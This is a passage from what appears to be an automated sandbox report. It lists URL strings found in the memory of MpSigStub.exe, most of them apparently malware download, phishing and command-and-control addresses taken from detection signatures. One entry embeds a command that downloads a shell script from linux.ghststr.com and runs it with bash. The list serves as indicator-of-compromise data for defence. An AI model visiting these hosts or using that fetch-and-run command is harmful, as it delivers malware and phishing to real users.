Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://karadyma.com/dhlpack/kfqakff/)
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://keramikadecor.com.ua/bdfg/excelzz/index.php
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp	String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://keyba01se.usa.cc/ktg.doc
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://khaleejposts.com/rgk/m_rs/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://kiranacorp.com/oja
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://kishi73.com.br/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://kovpro.com
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://kredytinksao.pl/raw.txt
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://ksn.a
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://l1ke.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://lab.l4ever.cn/ip/api/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://lapapahoster.com/safe_download/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://lavajatowi.sslblindado.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://lazexpo.info/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://lhx8z06.sed.nutritionservices.com
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://libre-templates.ddns.net/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://librebooton.ddns.net/booton.dot
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://libya2020.com.ly/music.mp3
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://lifehealthcareindia.com/google/google.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://lineacount.info/cgi-bin/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://lithi.io/file/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://log.soomeng.com/wb/jdq/?mac=%s
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://lolitaadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://loygf-99.gq/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://luport.com/templates/konkur/language/m
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://luyitaw.com/okasle.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://lychee22.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://mail.8u8y.com/ad/pic/123.txt
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://mail.madcoffee.com/index.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://mail.vodafone.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htaanyinwa.hta
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htamandela.hta
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htazeco.hta
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://malwarec2domain.com:3550/implant.exe
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://malwaredestructor.com/?aid=347
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://malwaredestructor.com/download.php?aid=347
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://manage1lnk.pw
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://maplestory.nexon.com
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://maq.com.pk/wehsd
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://maribit.com/count11.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://maringareservas.com.br/queda/index.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://mastic52.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://max-stats.com
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://mealpackage.biz/wp-admin/nbn3x/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://media.downloadmediacentral.com/law/?decinformation=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://mediabusnetwork.com/preconfirm.php?aid=
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://mediasportal.com/phandler.php?sid=500&aid=281&said=9&pn=2&pid=3
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://megatoolbar.net/inetcreative/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://meitao886.com/vass/vasss.doc
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://melmat.cf/obago.doc
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://members.giftera.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://members.xoom.com/devsfort/index.html
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://members.xoom.com/devsfort/index.htmlg
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://metclix.com
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://metznr.co/tor/index.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://mfjr.info/n2l/tmp/m.vbs
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://michiganpppp.com/work/doc/9.doc
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://microhelptech.com/gotoassist/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.erlivia.ltd/jikolo.doc
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://microsoftdata.linkpc.net/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://midfielders.ru/in.cgi?3&group=gdz&seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://mixbunch.cn/thread.html
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://mods1401z.webcindario.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://moffice.mrface.com/office.sct
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://moha-group.ir/nazy/doc/neworder.doc
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://mondaynews.tk/cam/cm.php?v=
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://monergismbooks.com/upgrade/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/assno.exe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/skapoland.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://moveisterrra.com/gb/add.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://movie.blogdns.org/asd
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://movie.daum.net/activeX/downloader/NcgAgentPOT_Setup.exe
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6298673850.00000197A43C2000.00000004.00000001.sdmp	String found in binary or memory: http://mp.profittrol.com/
